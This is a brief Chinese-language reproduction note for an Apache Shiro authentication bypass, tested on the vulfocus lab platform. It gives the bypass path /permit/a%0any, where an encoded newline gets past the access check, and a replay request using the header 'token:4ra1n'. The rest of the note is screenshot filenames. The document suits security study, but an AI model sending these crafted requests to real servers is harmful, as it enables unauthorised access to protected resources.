Apache Shiro 身份认证绕过漏洞

访问/permit/any,返回拒绝访问

1657173192_62c674c883f5841a74d1c.png

访问/permit/a%0any

1657173201_62c674d156b52eaef643d.png

利用/permit/any + token:4ra1n以 GET 请求重放攻击

d5f401db51304c4b889be014103a418e.png

复现

使用https://vulfocus.cn/#/dashboard

image.png

/permit/any

image.png

/permit/a%0any

image.png

/permit/any + token:4ra1n

image.png